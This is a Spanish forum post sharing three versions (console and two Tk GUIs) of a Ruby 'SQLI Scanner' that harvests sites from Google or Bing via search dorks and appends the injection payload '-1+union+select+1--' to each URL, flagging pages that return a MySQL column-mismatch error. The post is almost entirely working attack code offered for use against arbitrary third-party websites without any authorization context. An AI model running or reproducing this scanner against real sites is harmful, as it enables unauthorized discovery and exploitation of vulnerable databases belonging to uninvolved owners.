Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing.

Version consola :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
	begin
		return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
	rescue
		return "Error"
	end
end


def toma_ssl(web)
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
	return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		http = Net::HTTP.new(uri.host, uri.port)
		return http.post(uri.path,arg, headers).body
	rescue
		return "Error"
	end
end

def cortar(pages)
	final = ""
	finales = []
	pages.flatten.each do |page|
		if page=~/(.*)=(.*)/
			parte1 = $1
			parte2 = $2
			final = parte1 + "="
			finales.push(final)
		end
	end
	return finales
end


def google(dork,pages)

	links = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			partes = pagina
			if partes=~/url\?q=(.*)&sa/
				parte = $1
				link = URI::decode(parte)
				links.push(link)
			end
		end
		end
		links = links.uniq
	return links
end

def google_recursive(dork,pages)
	dork = dork.sub(/ /,"+")
	contador = 0
	guardo = []
	for i in ("1"..pages)
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		links = URI::extract(code)
		links.each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				link_final = "http://"+$2
				link_final = URI::decode(link_final)
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

def bing(dork,pages)

	guardo = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10

		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

		links = code.scan(/<h2><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end

		links = code.scan(/<h3><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

def uso 
	print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
	print "-search_bing : Find in Bing\n"
	print "-search_google : Find in Google\n"
	print "-scan_bing : Find SQLI in Bing\n"
	print "-scan_google : Find SQLI in Google\n"
	print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

def  head
	print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

def copyright
	print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]

head()

if !opcion or !dork or !pages
	uso()
else
	
	if opcion=="-search_bing"
		
		print "\n[+] Searching in Bing ...\n\n"
		
		links = bing(dork,pages)

		print "[+] Pages Count : "+links.count.to_s+"\n\n"

		if links.count.to_s=="0"
			print "[-] Links not found\n"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link+"\n"
		end
	
		print "\n[+] Finished\n"

	elsif opcion=="-search_google"
		
		print "\n[+] Searching in Google ...\n\n"
		
		links = google(dork,pages)

		if links.count.to_s=="0"
			print "[+] Searching in Google again ...\n\n"
			links = google_recursive(dork,pages)
		end

		print "[+] Pages Count : "+links.count.to_s
	
		if links.count.to_s=="0"
			print "[-] Links not found"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link+"\n"
		end
		
		print "\n[+] Finished\n"

	elsif opcion=="-scan_bing"
		
		print "\n[+] Searching in Bing ...\n\n"
		
		links = cortar(bing(dork,pages))

		print "[+] Pages Count : "+links.count.to_s+"\n\n"

		if links.count.to_s=="0"
			print "[-] Links not found\n"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					print " [OK]\n\a\a"
				else
					print " [FAIL]\n"
				end
			rescue
				print " [FAIL]\n"
			end
		end
	
		print "\n[+] Finished\n"
		
	elsif opcion=="-scan_google"
		
		print "\n[+] Searching in Google ...\n\n"
		
		links = cortar(google(dork,pages))

		if links.count.to_s=="0"
			print "[+] Searching in Google again ...\n\n"
			links = cortar(google_recursive(dork,pages))
		end

		print "[+] Pages Count : "+links.count.to_s+"\n\n"
	
		if links.count.to_s=="0"
			print "[-] Links not found"
		end

		links.flatten.each do |link|
			print "[+] Link : "+link
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					print " [OK]\n\a\a"
				else
					print " [FAIL]\n"
				end
			rescue
				print " [FAIL]\n"
			end
		end
	
		print "\n[+] Finished\n"
	else
		print "[-] Bad Option"
	end
end

copyright()


#The End ?
Version Tk para Google :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
	begin
		return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
	rescue
		return "Error"
	end
end


def toma_ssl(web)
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
	return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		http = Net::HTTP.new(uri.host, uri.port)
		return http.post(uri.path,arg, headers).body
	rescue
		return "Error"
	end
end

def cortar(pages)
	final = ""
	finales = []
	pages.flatten.each do |page|
		if page=~/(.*)=(.*)/
			parte1 = $1
			parte2 = $2
			final = parte1 + "="
			finales.push(final)
		end
	end
	return finales
end


def google(dork,pages)

	links = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			partes = pagina
			if partes=~/url\?q=(.*)&sa/
				parte = $1
				link = URI::decode(parte)
				links.push(link)
			end
		end
		end
		links = links.uniq
	return links
end

def google_recursive(dork,pages)
	dork = dork.sub(/ /,"+")
	contador = 0
	guardo = []
	for i in ("1"..pages)
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		links = URI::extract(code)
		links.each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				link_final = "http://"+$2
				link_final = URI::decode(link_final)
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

def bing(dork,pages)

	guardo = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10

		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

		links = code.scan(/<h2><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end

		links = code.scan(/<h3><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Dork : "
	place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Pages : "
	place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "Console"
	place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
	background "black"
	foreground "green"
	width 30
	height 9
	place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
	text "Search"
    background "black"
	foreground "green"
	width 17
	activebackground "green"
	highlightbackground  "green"
	command proc{
	
		dork = dork.value.to_s
		pages = pages.value.to_s

		console.insert("end",  "[+] Searching in Google ...\n\n")
		
		links = cortar(google(dork,pages))

		if links.count.to_s=="0"
			console.insert("end",  "[+] Searching in Google again ...\n\n")
			links = cortar(google_recursive(dork,pages))
		end

		console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
	
		if links.count.to_s=="0"
			console.insert("end", "[-] Links not found")
		end

		links.flatten.each do |link|
			console.insert("end", "[+] Link : "+link)
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					console.insert("end"," [OK]\n\a\a")
				else
					console.insert("end"," [FAIL]\n")
				end
			rescue
				console.insert("end", " [FAIL]\n")
			end
		end
		
		console.insert("end",  "\n[+] Finished")
		
	}
	place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen :

Imagen


Version Tk para Bing :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
	begin
		return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
	rescue
		return "Error"
	end
end


def toma_ssl(web)
	uri = URI.parse(web)
	nave = Net::HTTP.new(uri.host, uri.port)
	nave.use_ssl = true
	nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
	return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
	begin
		headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
		uri = URI(web)
		http = Net::HTTP.new(uri.host, uri.port)
		return http.post(uri.path,arg, headers).body
	rescue
		return "Error"
	end
end

def cortar(pages)
	final = ""
	finales = []
	pages.flatten.each do |page|
		if page=~/(.*)=(.*)/
			parte1 = $1
			parte2 = $2
			final = parte1 + "="
			finales.push(final)
		end
	end
	return finales
end


def google(dork,pages)

	links = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10
		code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
		paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
		paginas.flatten.each do |pagina|
			partes = pagina
			if partes=~/url\?q=(.*)&sa/
				parte = $1
				link = URI::decode(parte)
				links.push(link)
			end
		end
		end
		links = links.uniq
	return links
end

def google_recursive(dork,pages)
	dork = dork.sub(/ /,"+")
	contador = 0
	guardo = []
	for i in ("1"..pages)
		contador+=10
		url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
		code = toma_ssl(url)
		links = URI::extract(code)
		links.each do |link|
			if link=~/cache:(.*?):(.*?)\+/
				link_final = "http://"+$2
				link_final = URI::decode(link_final)
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

def bing(dork,pages)

	guardo = []
	dork = dork.sub(/ /,"+")
	contador = 0
	for i in ("1"..pages)
		contador+=10

		code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

		links = code.scan(/<h2><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end

		links = code.scan(/<h3><a href="(.*?)" h/)

		links.flatten.each do |link|
			link_final = URI::decode(link)
			if not link_final=~/http:\/\/778802\.r\.msn\.com\//
				guardo.push(link_final)
			end
		end
	end
	guardo = guardo.uniq
	return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Dork : "
	place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "    Pages : "
	place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
	background "black"
	foreground "green"
	width 25
	place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
	background "black"
	foreground "green"
	text "Console"
	place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
	background "black"
	foreground "green"
	width 30
	height 9
	place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
	text "Search"
    background "black"
	foreground "green"
	width 17
	activebackground "green"
	highlightbackground  "green"
	command proc{
	
		dork = dork.value.to_s
		pages = pages.value.to_s

		console.insert("end", "[+] Searching in Bing ...\n\n")
		
		links = cortar(bing(dork,pages))

		console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

		if links.count.to_s=="0"
			console.insert("end","[-] Links not found\n")
		end

		links.flatten.each do |link|
			console.insert("end", "[+] Link : "+link)
			begin
				url = toma(link + "-1+union+select+1--")
				if url=~/The used SELECT statements have a different number of columns/
					console.insert("end"," [OK]\n\a\a")
				else
					console.insert("end", " [FAIL]\n")
				end
			rescue
				console.insert("end"," [FAIL]\n")
			end
		end
		
		console.insert("end",  "\n[+] Finished")
		
	}
	place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen :

Imagen


Eso es todo.
Responder

Volver a “Otros lenguajes de Scripting”